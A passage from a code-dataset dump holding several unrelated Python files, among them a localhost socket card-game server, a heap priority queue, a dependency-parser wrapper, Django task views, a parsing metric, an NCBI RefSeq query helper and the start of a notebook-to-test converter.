# and 房主开始:\n 玩家控制.广播(用户='系统', 行为=f\"游戏开始\")\n # 游戏开始\n 线程 = threading.Thread(target=游戏.启动, args=())\n 线程.start()\n pass\n\n else:\n pass\n # 玩家控制.广播(行为='广播', 消息=f\"{消息['用户名']} 选择了 {消息['消息']}!\")\n\n\nclass 玩家:\n 金币 = 0\n 手牌 = list()\n 英雄池 = list()\n 角色 = None\n 准备 = False\n 跳回合 = False\n\n def __init__(self, 用户名='', 连接=None):\n self.用户名 = 用户名\n self.连接 = 连接\n\n def 发送(self, **字典):\n print(f\"私发给 {self.用户名} :{字典}\")\n self.连接.send(json.dumps(字典).encode())\n\n # 下面这个不应该存在,因为服务器不应该直接发送控制给客户端显示\n \"\"\"\n def 控制(self, **字典):\n print(f\"私发控制给 {self.用户名} :{字典}\")\n 字典['行为'] = '控制'\n self.连接.send(json.dumps(字典).encode())\n \"\"\"\n\n\nclass 玩家控制:\n 玩家列表 = list()\n\n @classmethod\n def 广播(cls, **字典):\n print(f\"广播:{字典}\")\n for 对象 in cls.玩家列表:\n 对象.连接.send(json.dumps(字典).encode())\n\n @classmethod\n def 私发(cls, ID, **字典):\n print(f\"私发给 {ID} :{字典}\")\n cls.搜索(ID).连接.send(json.dumps(字典).encode())\n\n @classmethod\n def 控制(cls, ID, **字典):\n print(f\"私发控制给 {ID} :{字典}\")\n 字典['行为'] = '控制'\n cls.搜索(ID).连接.send(json.dumps(字典).encode())\n\n @classmethod\n def 搜索(cls, ID):\n for 对象 in cls.玩家列表:\n if 对象.用户名 == ID:\n return 对象\n\n @classmethod\n def 搜索连接(cls, 连接):\n for 对象 in cls.玩家列表:\n if 对象.连接 == 连接:\n return 对象\n return False\n\n\nclass 游戏:\n 牌堆 = list()\n 弃牌堆 = list()\n 英雄池 = list()\n 回合数 = 1\n\n @classmethod\n def 启动(cls):\n # 初始化\n for 对象 in 玩家控制.玩家列表:\n 对象.金币 = 2\n\n for 类 in server.character.角色.角色.__subclasses__():\n cls.英雄池.append(类())\n random.shuffle(cls.英雄池)\n print()\n for 玩家 in 玩家控制.玩家列表:\n 玩家.角色 = cls.英雄池.pop()\n print(玩家.角色.名字)\n\n for 类 in server.champion.英雄.英雄.__subclasses__():\n if 类.金币 >= 7:\n for x in range(1):\n cls.牌堆.append(类())\n\n elif 类.金币 >= 5:\n for x in range(3):\n cls.牌堆.append(类())\n\n elif 类.金币 >= 1:\n for x in range(4):\n cls.牌堆.append(类())\n\n # random.shuffle(cls.牌堆)\n print()\n # 每张牌3张\n for 牌 in cls.牌堆:\n print(牌.名字)\n\n\n @classmethod\n 
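# 游戏结束 closes every player's socket and clears the lobby when the game ends
    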
def 游戏结束(cls):\n for 玩家 in 玩家控制.玩家列表:\n 玩家.连接.close()\n 玩家控制.玩家列表.clear()\n\n\n套接字 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n套接字.bind(('127.0.0.1', 8888))\n套接字.listen(5)\nwhile True:\n 连接, 地址 = 套接字.accept()\n print('收到一个新连接', 连接.getpeername(), 连接.fileno())\n # 第一步检查版本号\n 线程 = threading.Thread(target=用户线程, args=(连接,), daemon=True)\n 线程.start()\n","sub_path":"Server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":10661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"261918748","text":"import HeapSort as hs\ndef heapMaximum(a):\n return a[0]\n\ndef heapExtractMax(a):\n m = a[0]\n a[0] = a.pop()\n hs.maxHeapify(a,len(a),1)\n return m\n\n#head is 1\ndef heapIncreaseKey(a,i,key):\n a[i-1] = key \n while i > 1 and a[hs.parent(i)-1] < a[i-1]:\n a[i-1],a[hs.parent(i)-1] = a[hs.parent(i)-1],a[i-1] \n i = hs.parent(i)\n\n#test heapIncreaseKey\n#a = [16,14,10,8,7,9,3,2,4,1]\n#print(a)\n#heapIncreaseKey(a,9,15)\n#print(a)\n\ndef maxHeapInsert(a,key):\n a.append(float(\"-inf\"))\n heapIncreaseKey(a,len(a),key)\n\n#test maxHeapInsert \na = [16,14,10,8,7,9,3,2,4,1]\nprint(a)\nmaxHeapInsert(a,100)\nprint(a)","sub_path":"6堆排序/PriorityQueue.py","file_name":"PriorityQueue.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"134750034","text":"import collections\nimport os\n\nimport scrappybara.config as cfg\nfrom scrappybara.syntax.charset import Charset\nfrom scrappybara.syntax.dependencies import Dep\nfrom scrappybara.syntax.models import PDepsModel, TransModel\nfrom scrappybara.syntax.models import PTagsModel\nfrom scrappybara.syntax.tags import Tag\nfrom scrappybara.syntax.training_samples import vectorize_sentence, make_masks\nfrom scrappybara.syntax.transitions import Trans\nfrom scrappybara.syntax.wordset import Wordset\nfrom scrappybara.utils.multithreading import run_multithreads\nfrom scrappybara.utils.mutables import make_batches\nfrom scrappybara.utils.tree import Tree\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\nclass _Parse(object):\n \"\"\"Parsing a single sentence\"\"\"\n\n def __init__(self, seq_length, tag_codes, dep_codes, char_codes, word_vectors):\n \"\"\"Tokens & deps are non-padded\"\"\"\n self.__tag_codes = tag_codes\n self.__dep_codes = dep_codes\n self.__char_codes = char_codes\n self.__word_vectors = word_vectors\n self.tags = [Tag(code) for code in tag_codes[1:seq_length - 1]]\n self.__deps = [Dep(code) for code in dep_codes[1:seq_length - 1]]\n self.__buffer = collections.deque([idx for idx in range(seq_length - 2) if self.__deps[idx] != Dep.NODEP])\n self.__stack = collections.deque([])\n if self.__buffer:\n self.__shift()\n self.arcs = [] # Tuples (dep, parent_idx, child_idx)\n\n def __pdep(self, child_idx):\n pdep = self.__deps[child_idx]\n if pdep == Dep.ROOT:\n return Dep.SPLIT # ROOT cannot have any parent\n return pdep\n\n def __shift(self):\n self.__stack.append(self.__buffer.popleft())\n\n def __reduce(self):\n self.__stack.pop()\n if not self.__stack:\n self.__shift()\n\n @property\n def complete(self):\n return not self.__buffer\n\n @property\n def root(self):\n cands = set()\n cannot_be_root = set()\n for _, pdix, cidx in self.arcs:\n cands |= {pdix, cidx}\n cannot_be_root.add(cidx)\n try:\n return sorted(cands - cannot_be_root)[0]\n except IndexError:\n return None\n\n @property\n def mats(self):\n \"\"\"Materials for predicting the next transition\"\"\"\n mask_1, mask_2 = 
make_masks(self.__stack[-1] + 1, self.__buffer[0] + 1)\n return self.__tag_codes, self.__dep_codes, self.__char_codes, self.__word_vectors, mask_1, mask_2\n\n def register_transition(self, trans):\n if trans == Trans.LEFT:\n self.arcs.append((self.__pdep(self.__stack[-1]), self.__buffer[0], self.__stack[-1]))\n self.__reduce()\n elif trans == Trans.RIGHT:\n self.arcs.append((self.__pdep(self.__buffer[0]), self.__stack[-1], self.__buffer[0]))\n self.__shift()\n elif trans == Trans.REDUCE:\n self.__reduce()\n elif trans == Trans.SHIFT:\n self.__shift()\n\n\ndef _build_tree(parse):\n \"\"\"Converts parse to tree, returns None if no root is detected\"\"\"\n root = parse.root\n if root is None:\n return None\n else:\n tree = Tree(root)\n for dep, parent_idx, child_idx in parse.arcs:\n tree.register_child(dep, parent_idx, child_idx)\n return tree\n\n\nclass Parser(object):\n\n def __init__(self, language_model, batch_size):\n self.__batch_size = batch_size\n self.__charset = Charset().load()\n self.__wordset = Wordset(language_model).load()\n self.__ptags_model = PTagsModel(len(self.__charset)).load()\n self.__pdeps_model = PDepsModel(len(self.__charset)).load()\n self.__trans_model = TransModel(len(self.__charset)).load()\n\n def __call__(self, token_lists):\n \"\"\"Parses sentences by batch\"\"\"\n mats = run_multithreads(token_lists, self.__vectorize_sentence, cfg.NB_PROCESSES)\n batches = make_batches(mats, self.__batch_size)\n all_parses = []\n for batch in batches:\n seq_lengths, char_codes, word_vectors = zip(*batch)\n tag_codes = self.__predict_tags(char_codes, word_vectors)\n dep_codes = self.__predict_deps(tag_codes, char_codes, word_vectors)\n for idx, seq_length in enumerate(seq_lengths):\n all_parses.append(\n _Parse(seq_length, tag_codes[idx], dep_codes[idx], char_codes[idx], word_vectors[idx]))\n # Predict transitions\n incomplete_parses = [parse for parse in all_parses if not parse.complete]\n while incomplete_parses:\n parse_batches = make_batches(incomplete_parses, self.__batch_size)\n for batch in parse_batches:\n self.__predict_transitions(batch)\n incomplete_parses = [parse for parse in all_parses if not parse.complete]\n # Prepare results\n all_tags = [parse.tags for parse in all_parses]\n all_trees = run_multithreads(all_parses, _build_tree, cfg.NB_PROCESSES)\n return all_tags, all_trees\n\n def __vectorize_sentence(self, tokens):\n return vectorize_sentence(tokens, self.__charset, self.__wordset)\n\n def __predict_tags(self, char_codes, word_vectors):\n return self.__ptags_model.predict(char_codes, word_vectors)\n\n def __predict_deps(self, tag_codes, char_codes, word_vectors):\n return self.__pdeps_model.predict(tag_codes, char_codes, word_vectors)\n\n def __predict_transitions(self, parses):\n \"\"\"Predicts next transitions & registers them in place\"\"\"\n tag_codes, dep_codes, char_codes, word_vectors, masks_1, masks_2 = zip(*[parse.mats for parse in parses])\n predictions = self.__trans_model.predict(tag_codes, dep_codes, char_codes, word_vectors, masks_1, masks_2)\n for idx, trans in enumerate(predictions):\n parses[idx].register_transition(trans)\n","sub_path":"scrappybara/syntax/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"494801583","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, reverse, get_object_or_404, HttpResponse\nfrom .models import Task\nfrom likes.models 
import Like\nfrom comments.models import Comment\nfrom django import forms\nfrom django.forms import ModelForm\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit\nfrom django.views.generic import UpdateView,CreateView\nfrom django.db import models\nfrom django.views.decorators.csrf import csrf_exempt\nfrom jsonrpc import jsonrpc_method\nfrom jsonrpc.exceptions import Error\nfrom django.http import JsonResponse\n\ndef task_list(request):\n\n context = {\n 'tasks': Task.objects.all()\n }\n\n return render(request, 'tasks/tasks_list.html', context)\n\ndef task_detail(request, pk=None):\n task = get_object_or_404(Task, id=pk)\n like_form = LikeForm()\n form = CommentForm()\n take_form = TakeTaskForm()\n close_form = CloseTaskForm()\n\n if request.method == 'POST':\n\n if 'take' in request.POST:\n take_form = TakeTaskForm(request.POST)\n if take_form.is_valid():\n task.usertask.add(request.user)\n task.save()\n\n elif 'close' in request.POST:\n close_form = CloseTaskForm(request.POST)\n if close_form.is_valid():\n task.is_finished = True\n task.save()\n\n else:\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = request.user\n comment.task_id = pk\n comment.save()\n form = CommentForm()\n\n elif request.method == 'GET':\n Task.objects.filter(id=task.id).update(viewcount=models.F('viewcount') + 1)\n\n\n\n context ={\n 'task': task,\n 'likes': Like.objects.all().filter(is_active=True, task=task),\n 'comment_form': form,\n 'like_form' : like_form,\n 'take_form' : take_form,\n 'close_form' : close_form,\n 'comments': Comment.objects.all().filter(is_archieve=False, task=task).order_by('created')\n }\n\n return render(request, 'tasks/tasks_detail.html', context)\n\n\nclass EditTaskForm(ModelForm):\n class Meta:\n model = Task\n fields = ['name','prescription']\n\n def __init__(self,*args,**kwargs):\n super(EditTaskForm,self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_method = 'post'\n self.helper.add_input(Submit('submit','Сохранить'))\n\n\nclass TaskEdit (UpdateView):\n form_class = EditTaskForm\n context_object_name = 'task'\n template_name = 'tasks/tasks_edit.html'\n\n def get_queryset(self):\n return Task.objects.all()\n\n def get_success_url(self):\n return reverse('task:task_detail', kwargs={'pk': self.object.pk})\n\n\nclass TaskForm(ModelForm):\n class Meta:\n model = Task\n fields = ['name','prescription','categories']\n\n def __init__(self,*args,**kwargs):\n super(TaskForm,self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_method = 'post'\n self.helper.add_input(Submit('submit','Сохранить'))\n\n\nclass TaskCreate(CreateView):\n form_class = TaskForm\n context_object_name = 'task'\n template_name = 'tasks/tasks_create.html'\n\n def form_valid(self, form):\n form.instance.auth = self.request.user\n return super(TaskCreate, self).form_valid(form)\n\n def get_success_url(self):\n return reverse('task:task_detail', kwargs={'pk': self.object.pk})\n\n\nclass CommentForm(ModelForm):\n class Meta:\n model = Comment\n fields = ['text']\n\n def __init__(self, *args, **kwargs):\n super(CommentForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_method = 'post'\n self.helper.add_input(Submit('submit', 'Добавить комментарий'))\n\n\ndef task_comments(request, pk=None):\n\n task = get_object_or_404(Task, id=pk)\n context = {\n 'comments': task.task_comments.all().filter(is_archieve=False, comment=None).order_by('created')\n 
}\n\n return render(request, 'tasks/widjets/comments_all.html', context)\n\n\nclass AddCommentForm(ModelForm):\n class Meta:\n model = Comment\n fields = ['text']\n\n def __init__(self, *args, **kwargs):\n super(AddCommentForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.add_input(Submit('submit', 'Ответить'))\n\n\ndef count_likes(request, pk=None):\n\n task = get_object_or_404(Task, id=pk)\n\n context = {\n 'likes': task.likes.filter(is_active=True)\n }\n return render(request, 'tasks/widjets/likes.html', context)\n\n\nclass LikeForm(ModelForm):\n class Meta:\n model = Like\n fields = []\n\n def __init__(self, *args, **kwargs):\n super(LikeForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.add_input(Submit('submit', 'Лайкнуть'))\n\n\nclass TakeTaskForm(forms.Form):\n class Meta:\n model = Task\n fields = []\n\n def __init__(self, *args, **kwargs):\n super(TakeTaskForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.add_input(Submit('take', 'Взять задание'))\n\n\nclass CloseTaskForm(ModelForm):\n class Meta:\n model = Task\n fields = []\n\n def __init__(self, *args, **kwargs):\n super(CloseTaskForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.add_input(Submit('close', 'Закрыть задание'))\n\n\ndef like_add(request, pk=None):\n task = get_object_or_404(Task, id=pk)\n form = LikeForm(request.POST)\n if form.is_valid():\n if task.likes.filter(author=request.user).count() == 0:\n like = form.save(commit=False)\n like.author = request.user\n like.task = task\n like.save()\n return HttpResponse(\"OK\")\n else:\n like = task.likes.get(author=request.user)\n like.is_active = not like.is_active\n like.save()\n return HttpResponse(\"OK\")\n\n return HttpResponse(\"Failed\")\n\n\ndef task_comment_add (request, pk=None, parent_id=None):\n task = get_object_or_404(Task, id=pk)\n parent = get_object_or_404(task.task_comments, id=parent_id)\n form = AddCommentForm(request.POST)\n if request.method == 'POST':\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = request.user\n comment.task_id = pk\n comment.comment = parent\n comment.save()\n form = AddCommentForm()\n\n context = {\n 'comment_form': form,\n }\n return render(request, 'tasks/widjets/comment_add.html', context)\n\n\n@csrf_exempt\ndef get_all_tasks(request):\n tasks = Task.objects.all()\n\n tasks_json = []\n for task in tasks:\n tasks_json.append({\n 'id': task.id,\n 'auth_id': task.auth_id,\n 'name': task.name,\n 'description': task.prescription,\n 'categories_id': [obj for obj in task.categories.values_list('id', flat=True)],\n })\n\n return JsonResponse(tasks_json, safe=False)\n\n\n\n\n\n\n\n\n","sub_path":"project/source/task/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"181953092","text":"from itertools import groupby\nfrom typing import Optional, List, Any, Callable\nfrom typing import Tuple\n\nimport numpy as np\nimport torch\nfrom allennlp.nn.chu_liu_edmonds import decode_mst\nfrom pytorch_lightning.metrics import Metric\nimport warnings\n\nfrom parser.metrics.attachment_scores import AttachmentScores\n\nfrom parser.utils.logger import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass T2TAttachmentScores(Metric):\n \"\"\"\n Computes 
labeled and unlabeled attachment scores for a\n    dependency parse, as well as sentence level exact match\n    for both labeled and unlabeled trees. Note that the input\n    to this metric is the sampled predictions, not the distribution\n    itself. This metric is used when labels and arcs are not computed\n    in a single sample, but across multiple consecutive samples.\n\n    # Parameters\n\n    ignore_classes : `List[int]`, optional (default = `None`)\n        A list of label ids to ignore when computing metrics.\n    \"\"\"\n\n    def __init__(\n        self,\n        compute_on_step: bool = True,\n        dist_sync_on_step: bool = False,\n        process_group: Optional[Any] = None,\n        dist_sync_fn: Callable = None,\n        ignore_classes: List[int] = None,\n        child_score_alpha: float = 1.0\n    ):\n        super(T2TAttachmentScores, self).__init__()\n        self.normal_attachment_score = AttachmentScores(\n            compute_on_step,\n            dist_sync_on_step,\n            process_group,\n            dist_sync_fn,\n            ignore_classes\n        )\n        self.add_state(\"to_compute_anns\", default=[], dist_reduce_fx=None)\n        self.child_score_alpha = child_score_alpha\n\n    def update(  # type: ignore\n        self,\n        ann_idxs: List[int],\n        word_idxs: List[int],\n        sent_lens: List[int],\n        parent_probs: torch.Tensor,\n        parent_tag_probs: torch.Tensor,\n        child_probs: torch.Tensor,\n        child_tag_probs: torch.Tensor,\n        span_idx: torch.Tensor,\n        span_tag: torch.Tensor,\n        mask: Optional[torch.BoolTensor] = None,\n    ):\n        \"\"\"\n        # Parameters\n        ann_idxs: `List`, required.\n            A list of sample indexes. Different queries from the same sentence have the same ann_idx.\n        word_idxs: `List`, required.\n            A list of word indexes indicating which word is queried.\n        sent_lens: `List`, required.\n            A list of sample length integers.\n        parent_probs: `torch.Tensor`, required.\n            A tensor of parent predictions of shape (batch_size, timesteps).\n        parent_tag_probs: `torch.Tensor`, required.\n            A tensor of parent tag predictions of shape (batch_size, timesteps, num_tag_classes)\n        child_probs: `torch.Tensor`, required.\n            A tensor of parent predictions of shape (batch_size, timesteps).\n        child_tag_probs: `torch.Tensor`, required.\n            A tensor of parent tag predictions of shape (batch_size, timesteps, num_tag_classes)\n        span_idx : `torch.LongTensor`, required.\n            A torch tensor representing the gold span position target\n            in the dependency parse. Has shape `(batch_size, 2)`.\n        span_tag : `torch.LongTensor`, required.\n            A torch tensor representing the dependency tag. Has shape `(batch_size)`.\n        mask : `torch.BoolTensor`, optional (default = `None`).\n            A tensor of the same shape as `predicted_indices`. 
if False, mask the corresponding position\n \"\"\"\n for fields in zip(ann_idxs, word_idxs, sent_lens,\n parent_probs.detach().cpu().numpy(), parent_tag_probs.detach().cpu().numpy(),\n child_probs.detach().cpu().numpy(), child_tag_probs.detach().cpu().numpy(),\n span_idx.detach().cpu().numpy(), span_tag.detach().cpu().numpy(),\n mask.detach().cpu().numpy()):\n self.to_compute_anns.append(fields)\n\n def compute(self):\n num_tag = self.to_compute_anns[0][4].shape[-1]\n logger.info(\"grouping samples according to ann-idx ...\")\n self.to_compute_anns = sorted(self.to_compute_anns, key=lambda x: x[0])\n group_samples = [list(v) for k, v in groupby(self.to_compute_anns, lambda x: x[0])]\n logger.info(f\"grouping {len(group_samples)} sentences and running mst on all samples ...\")\n for mrc_samples in group_samples:\n sent_len = mrc_samples[0][2]\n seq_len = sent_len + 1 # add [head]\n\n if len(mrc_samples) != sent_len:\n warnings.warn(\"compute() should be called only when **all** mrc samples have been updated.\")\n continue\n\n # gather from multiple mrc samples to compute final tree\n gold_indices = torch.ones([sent_len], dtype=torch.long)\n gold_labels = torch.ones([sent_len], dtype=torch.long)\n eval_mask = torch.ones([sent_len], dtype=torch.bool)\n parent_attended_arcs = torch.zeros([seq_len, seq_len])\n parent_pairwise_head_probs = torch.zeros([seq_len, seq_len, num_tag])\n child_attended_arcs = torch.zeros([seq_len, seq_len])\n child_pairwise_head_probs = torch.zeros([seq_len, seq_len, num_tag])\n # note: timesteps==sent_len*2+3, because of mrc format.\n # parent_probs: [seq_len*2+3], parent_tag_probs: [seq_len*2+3, num_tag_classes], span_idx: 2, span_tag: 1\n for (_, word_idx, sent_len, sent_parent_probs, sent_parent_tag_probs,\n sent_child_probs, sent_child_tag_probs,\n sent_span_idx, sent_span_tag, mask) in mrc_samples:\n gold_pos = sent_span_idx[0]\n gold_indices[word_idx] = gold_pos-sent_len-2\n gold_labels[word_idx] = sent_span_tag\n eval_mask[word_idx] = bool(mask)\n context_start, context_end = sent_len + 2, 2 * sent_len + 3\n # add parent score\n parent_attended_arcs[word_idx+1] = torch.FloatTensor(sent_parent_probs[context_start: context_end])\n parent_pairwise_head_probs[word_idx+1] = torch.FloatTensor(sent_parent_tag_probs[context_start: context_end])\n # add child score\n child_attended_arcs[:, word_idx+1] = torch.FloatTensor(sent_child_probs[context_start: context_end])\n child_pairwise_head_probs[:, word_idx+1] = torch.FloatTensor(sent_child_tag_probs[context_start: context_end])\n # todo debug child score\n pairwise_head_probs = parent_pairwise_head_probs #* (child_pairwise_head_probs ** self.child_score_alpha)\n attended_arcs = parent_attended_arcs #* (child_attended_arcs ** self.child_score_alpha)\n pairwise_head_probs = pairwise_head_probs / torch.sum(pairwise_head_probs, dim=-1, keepdim=True)\n attended_arcs = attended_arcs / torch.sum(attended_arcs, dim=-1, keepdim=True)\n\n # This energy tensor expresses the following relation:\n # energy[i,j] = \"Score that i is the head of j\". 
In this\n # case, we have heads pointing to their children.\n batch_energy = pairwise_head_probs.permute(2, 1, 0).unsqueeze(0) \\\n * attended_arcs.transpose(0, 1).view(1, 1, seq_len, seq_len)\n\n predicted_indices, predicted_labels = self._run_mst_decoding(batch_energy, lengths=np.array([seq_len]))\n\n # We calculate attachment scores for the whole sentence\n # but excluding the symbolic ROOT token at the start,\n # which is why we start from the second element in the sequence.\n self.normal_attachment_score.update(\n predicted_indices[:, 1:], predicted_labels[:, 1:], gold_indices, gold_labels, eval_mask\n )\n\n return self.normal_attachment_score.compute()\n\n @staticmethod\n def _run_mst_decoding(\n batch_energy: torch.Tensor, lengths: torch.Tensor\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n heads = []\n head_tags = []\n for energy, length in zip(batch_energy.detach().cpu(), lengths):\n scores, tag_ids = energy.max(dim=0)\n # Although we need to include the root node so that the MST includes it,\n # we do not want any word to be the parent of the root node.\n # Here, we enforce this by setting the scores for all word -> ROOT edges\n # edges to be 0.\n scores[0, :] = 0\n # Decode the heads. Because we modify the scores to prevent\n # adding in word -> ROOT edges, we need to find the labels ourselves.\n instance_heads, _ = decode_mst(scores.numpy(), length, has_labels=False)\n\n # Find the labels which correspond to the edges in the max spanning tree.\n instance_head_tags = []\n for child, parent in enumerate(instance_heads):\n instance_head_tags.append(tag_ids[parent, child].item())\n # We don't care what the head or tag is for the root token, but by default it's\n # not necessarily the same in the batched vs unbatched case, which is annoying.\n # Here we'll just set them to zero.\n instance_heads[0] = 0\n instance_head_tags[0] = 0\n heads.append(instance_heads)\n head_tags.append(instance_head_tags)\n return (\n torch.from_numpy(np.stack(heads)).to(batch_energy.device),\n torch.from_numpy(np.stack(head_tags)).to(batch_energy.device),\n )\n","sub_path":"parser/metrics/t2t_attachment_scores.py","file_name":"t2t_attachment_scores.py","file_ext":"py","file_size_in_byte":9458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"396548944","text":"#!/usr/bin/env python\nimport requests\nimport re\n\ndef functionRefSeq(organism,query,database,option,list_id) :\n url=\"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db={}&term={}[Organism]+{}[Gene Name]&idtype=acc&retmode=json\".format(database,organism,query)\n r=requests.get(url)\n if not r.ok :\n list_id+=[\"No Data Available\"]\n else :\n decoded = r.json()\n result=repr(decoded[\"esearchresult\"][\"idlist\"])\n list_id=re.findall(\"[NX]{}_\\d+.\\d\".format(option),result)\n return(list_id)","sub_path":"Morgane/refseq.py","file_name":"refseq.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"124732753","text":"\"\"\"Cell functions.\"\"\"\nfrom collections import defaultdict\nfrom tokenize import (untokenize, NEWLINE, NAME, OP)\nimport re\nimport shlex\nimport os\nimport nbformat\nimport celltest\nfrom celltest.utils import (glue, _tokenize, indent, replace_asserts,\n save_outputs, remove_docstring,\n get_template_from_file, get_notebook_name,\n get_template_file, logger, root_logger,\n parse_params)\nfrom celltest.funclib import get_outputs\n\n\nclass CellConvert():\n \"\"\"Notebook 
converter.\"\"\"\n\n  def __init__(self, **kwargs):\n    \"\"\"Read all relevant info from notebook.\"\"\"\n    # default values\n    default_kwargs = {\n        \"filepath\": None,\n        \"callbacks\": [],\n        \"insert_saved_outputs\": True,\n        \"output_file\": None,\n        \"header_file\": None,\n        \"standard_template\": None,\n        \"custom_template\": None,\n        \"verbose\": False,\n    }\n    self.accepted = {\n        \"params\": [\n            \"comment\", \"setup\", \"ignore_outputs\", \"ignore_stderr\",\n            \"ignore_stdout\", \"ignore\", \"ignore_display_data\", \"run_all_till_now\"\n        ],\n        \"callbacks\": [(\"black\",), (\"yapf\", \"-i\"), (\"isort\",)]\n    }\n\n    # check params\n    for kwarg in kwargs:\n      if kwarg not in default_kwargs:\n        raise ValueError(\"Unknown parameter: %s\" % kwarg)\n    self.kwargs = default_kwargs.copy()\n    self.kwargs.update(kwargs)\n    for callback in self.kwargs[\"callbacks\"]:\n      if callback not in [x[0] for x in self.accepted[\"callbacks\"]]:\n        raise ValueError(\"Unknown callback: %s\" % callback)\n\n    if self.kwargs[\"verbose\"]:\n      logger.setLevel('DEBUG')\n    else:\n      logger.setLevel(root_logger.handlers[0].level)\n\n    # get input filepath. If not provided, assume we're in a notebook environment\n    # and the current file is the one to be transformed\n    if self.kwargs[\"filepath\"] is None:\n      try:\n        self.filepath = get_notebook_name()\n      except Exception as excp:\n        raise ValueError(\n            \"Notebook name not provided and could \"\n            \"not be derived from current environment. Please \"\n            \"provide notebook name(s) that have to be converted\") from excp\n    else:\n      self.filepath = os.path.join(os.getcwd(), self.kwargs[\"filepath\"])\n\n    # read template\n    template_file = get_template_file(self.kwargs[\"standard_template\"],\n                                      self.kwargs[\"custom_template\"])\n    self.templ = get_template_from_file(template_file)\n    if not self.templ:\n      raise ValueError(\"Could not read template from file %s\" %\n                       template_file)\n\n    # gather header control params\n    self.control_params_d = defaultdict(dict)\n    for header_line in [\"insert_saved_outputs\", \"header_file\"]:\n      if self.kwargs[header_line]:\n        self.control_params_d[\"head_level\"][header_line] = True\n\n    # gather replacements for the template file\n    self.replacements = {}  # defaultdict(lambda: None)\n    with open(os.path.join(os.path.dirname(celltest.__file__),\n                           \"funclib.py\")) as funclib_file:\n      self.replacements[\"funclib\"] = remove_docstring(funclib_file.read())\n    if self.kwargs[\"header_file\"]:\n      with open(kwargs[\"header_file\"]) as file_:\n        self.replacements[\"header_file\"] = file_.read()\n    self.replacements[\"accepted_params\"] = self.accepted[\"params\"]\n    self.replacements[\"accepted_callbacks\"] = \", \".join(\n        x[0] for x in self.accepted[\"callbacks\"])\n    self.replacements[\"filefullpath\"] = self.filepath\n    self.replacements[\"notebook_name\"] = os.path.split(self.filepath)[1]\n\n    # gather code, outputs, and metadata\n    self.code_d_ = {}  # this will be changing\n    self.metadata_d = {}\n    self.ct_saved_cell_outputs = get_outputs(self.filepath, pretty_quotes=True)\n    with open(self.filepath) as file:\n      self.cells = nbformat.read(file, nbformat.NO_CONVERT).cells\n    # for ease of usage read all relevant cells into separate lists\n    for index, cell in enumerate(self.cells):\n      if cell.cell_type == \"code\":\n        self.code_d_[index] = cell.source\n      if \"celltest\" in cell.metadata:\n        self.metadata_d[index] = cell.metadata.celltest\n\n    # get file name where to write the results\n    path, name = os.path.split(self.filepath)\n    name = os.path.splitext(name)[0]\n    if self.kwargs[\"output_file\"]:\n      
self.output = self.kwargs[\"output_file\"]\n else:\n self.output = os.path.join(path, \"test_\" + name + \".py\")\n\n def carve_magic(self, update=True):\n \"\"\"Carve out notebook magic.\"\"\"\n clean_code_d = {}\n magic_code_d_ = {}\n for cell_index, cell in self.code_d_.items():\n lines = cell.split(\"\\n\")\n if lines[0].strip().startswith(\"%\"):\n magic_code_d_[cell_index] = lines[0]\n clean_code_d[cell_index] = \"\\n\".join(lines[1:])\n else:\n clean_code_d[cell_index] = cell\n if update:\n self.code_d_ = clean_code_d\n return magic_code_d_, clean_code_d\n\n def carve_control_params(self, update=True):\n \"\"\"Read control params from comments or metadata.\"\"\"\n control_params_d = defaultdict(dict)\n clean_code_d = {}\n\n # params first get collected from metadata\n for cell_index, metadata in self.metadata_d.items():\n params_d = parse_params(metadata, self.accepted[\"params\"])\n control_params_d[cell_index].update(params_d)\n\n # then from cell itself, if conflict cell params have priority\n for cell_index, cell in self.code_d_.items():\n lines = cell.split(\"\\n\")\n if lines[0].strip().startswith(\"%\"):\n lines.pop(0)\n params_string = re.match(r\"^#\\s+CT:(.*)\", lines[0].strip())\n if params_string:\n params_string_ = params_string[1]\n clean_code_d[cell_index] = \"\\n\".join(lines[1:])\n else:\n params_string_ = \"\"\n clean_code_d[cell_index] = cell\n\n params_d = parse_params(\n shlex.split(params_string_), self.accepted[\"params\"])\n control_params_d[cell_index].update(params_d)\n\n if update:\n self.code_d_ = clean_code_d\n\n self.control_params_d.update(control_params_d)\n return self.control_params_d\n\n def carve_setup(self, update=True):\n \"\"\"Get setup code.\"\"\"\n setup_code_l = []\n clean_code_d = {}\n for cell_index, cell in self.code_d_.items():\n if \"setup\" in self.control_params_d[cell_index]:\n setup_code_l.append(cell.strip())\n else:\n clean_code_d[cell_index] = cell\n setup_code = \"\\n\".join(setup_code_l)\n\n logger.debug(\"setUp code: %s\", 